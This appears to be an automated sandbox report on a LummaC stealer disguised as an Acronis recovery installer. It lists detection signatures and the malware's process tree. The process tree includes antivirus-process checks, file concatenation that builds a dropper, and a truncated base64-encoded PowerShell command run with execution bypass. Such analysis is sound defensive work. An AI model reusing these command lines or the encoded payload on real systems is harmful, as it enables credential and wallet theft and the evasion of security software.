Edit tour
Windows
Analysis Report
acronis recovery expert deluxe 1.0.0.132.rarl.exe
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64_ra
- acronis recovery expert deluxe 1.0.0.132.rarl.exe (PID: 7144 cmdline:
"C:\Users\ user\Deskt op\acronis recovery expert del uxe 1.0.0. 132.rarl.e xe" MD5: 2C83FB776A9E238D88E32393F17AE06A) - cmd.exe (PID: 6272 cmdline:
"C:\Window s\System32 \cmd.exe" /c copy Ki ll Kill.cm d & Kill.c md MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6296 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6668 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 6620 cmdline:
findstr /I "opssvc w rsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 5948 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 4692 cmdline:
findstr "A vastUI AVG UI bdservi cehost nsW scSvc ekrn SophosHea lth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 5744 cmdline:
cmd /c md 650429 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - findstr.exe (PID: 2864 cmdline:
findstr /V "GERMANY" False MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 6148 cmdline:
cmd /c cop y /b ..\Mu rray + ..\ Indication + ..\Inst itution + ..\Metres + ..\Displ ay + ..\Cr + ..\Prog ramming D MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - Palestine.com (PID: 6176 cmdline:
Palestine. com D MD5: 62D09F076E6E0240548C2F837536A46A) - powershell.exe (PID: 4540 cmdline:
powershell -exec byp ass -ENc L gAoACgARwB FAFQALQB2A GEAUgBJAEE AQgBMAGUAI AAnACoATQB kAHIAKgAnA CkALgBuAGE ATQBlAFsAM wAsADEAMQA sADIAXQAtA GoAbwBJAG4 AJwAnACkAI AAoACgAKAA nAFMARQB0A C0AdgBhAFI ASQBhAEIAb ABlACAAKAA 2AFMAdgA4A G0AYQA2AFM AdgArADYAU wB2AEYAWgA 2AFMAdgApA CAAIAAoACA AWwBUAFkAc AAnACsAJwB FAF0AKAA2A FMAdgB7ADI AfQB7ADAAf QB7ADMAfQB 7ADQAfQB7A DEAfQA2AFM AdgAtAEYAb ABUAFYAZQB sAFQAVgAsA GwAVAAnACs AJwBWAEkAT gBsAFQAVgA sAGwAVABWA FMAeQAnACs AJwBTAFQAb ABUAFYALAB sAFQAVgBtA C4AaQBvAGw AVABWACwAb ABUAFYALgB TAGUARQBLA G8AUgBJAEc AbABUAFYAK QApADsAIAB zAEUAdAAtA EkAVABlAE0 AIAAgAFYAY QByAGkAYQB iAGwAZQA6A DgAQQBQAGM AIAAgACgAI ABbAFQAeQB wAGUAXQAoA DYAUwB2AHs AMQB9AHsAM gB9AHsAMAB 9ACcAKwAnA DYAUwB2ACA ALQBGACAAb ABUAFYARAB sAFQAVgAsA GwAVABWAFM AWQBzAGwAV ABWACwAbAB UAFYAdABFA E0ALgBnAFU AJwArACcAS QBsAFQAJwA rACcAVgApA CAAIAApACA AOwAgAHMAV gAgAGMAZwA wACcAKwAnA HEAIAAoACA AWwB0AFkAU ABlAF0AKAA 2AFMAdgB7A DMAfQB7ADA AfQB7ADEAf QB7ADQAfQB 7ADIAfQA2A FMAdgAgAC0 ARgBsAFQAV gB0AGUATQA uAGkATwAnA CsAJwBsAFQ AVgAsAGwAV ABWAC4AUAB sAFQAVgAsA GwAVABWAGg AbABUAFYAL ABsAFQAVgB TAFkAUwBsA FQAVgAsAGw AVABWAEEAV AAnACsAJwB sAFQAVgApA CkAJwArACc AIAA7ACAAU wBlAHQALQB WAGEAcgBpA CcAKwAnAGE AYgBsAGUAI AAtAE4AYQB tAGUAIAB1A EIAMgBnAHQ AIAAtAFYAY QBsAHUAZQA gACgAWwBUA FkAUABlAF0 AKAA2AFMAd gB7ADEAfQB 7ADIAfQB7A DAAfQB7ADM AfQA2AFMAd gAgAC0AZgA gAGwAVABWA EUAbQAuAEk AJwArACcAT wAuAEYAbAB UAFYALABsA FQAVgBTAHk AbABUAFYAL ABsAFQAVgB TAFQAbABUA FYALABsAFQ AVgBJAEwAR QBsAFQAVgA pACkAIAAgA DsAIABTAGU AdAAtAFYAY QByAGkAYQB iAGwAZQAgA C0ATgBhAG0 AZQAgAHMAY wBSAEkAUAB UAEIATABPA EMAawAgAC0 AVgBhAGwAd QBlACAAKAB 7AAoAIAAnA CsAJwAgACA AIABTAGUAd AAtAFYAYQB yAGkAYQBiA GwAZQAgAC0 ATgBhAG0AZ QAgAFoASQB QAFUAUgBsA CAALQBWAGE AbAB1AGUAI AAoADYAUwB 2AHsAMwB9A HsANwB9AHs ANgB9AHsAN AB9AHsAOQB 9AHsAMQB9A HsAMQAwAH0 AewA4AH0Ae wAwAH0AewA 1AH0AewAyA H0ANgBTAHY AIAAtAGYAb ABUAFYAdAB sACcAKwAnA FQAVgAsAGw AVABWAHAAL wBsACcAKwA nAFQAVgAsA GwAVABWAHQ AeAB0AGwAV ABWACwAbAB UAFYAaAB0A GwAVABWACw AbABUAFYAa QBwAHQAZQB kAGUAbABUA FYALABsAFQ AVgBfAGMAb ABwAF8AcAB hAG4ALgBsA FQAVgAsAGw AVABWAHMAO gAvAC8AawB sAGwAVABWA CwAbABUAFY AdABwAGwAV ABWACwAbAB UAFYAbgBsA FQAVgAsAGw AVABWAGgAb wBhAC4AcwB oACcAKwAnA G8AbABUAFY ALABsAFQAV gBpAGwAVAB WACkACgAgA CAAIAAgAFM AZQB0AC0AV gBhAHIAaQB hAGIAbABlA CAALQBOAGE AbQBlACAAd wBFAEIAYwB sAEkARQBOA HQAIAAtAFY AYQBsAHUAZ QAgACgALgA oADYAUwB2A HsAMQB9AHs AMgB9AHsAM AB9ADYAUwB 2ACAALQBmA GwAVABWAGo AZQBjAHQAb ABUAFYALAB sAFQAVgBOA GUAdwBsAFQ AVgAsAGwAV ABWAC0ATwB iAGwAVABWA CkAIAAoADY AUwB2AHsAM QB9AHsAMAB 9AHsAMgB9A HsAMwB9ADY AUwB2AC0AZ gAgAGwAVAB WAGUAdAAuA FcAbABUAFY ALABsAFQAV gBTAHkAcwA nACsAJwB0A GUAbQAuAE4 AbABUAFYAL ABsAFQAVgB lAGwAVABWA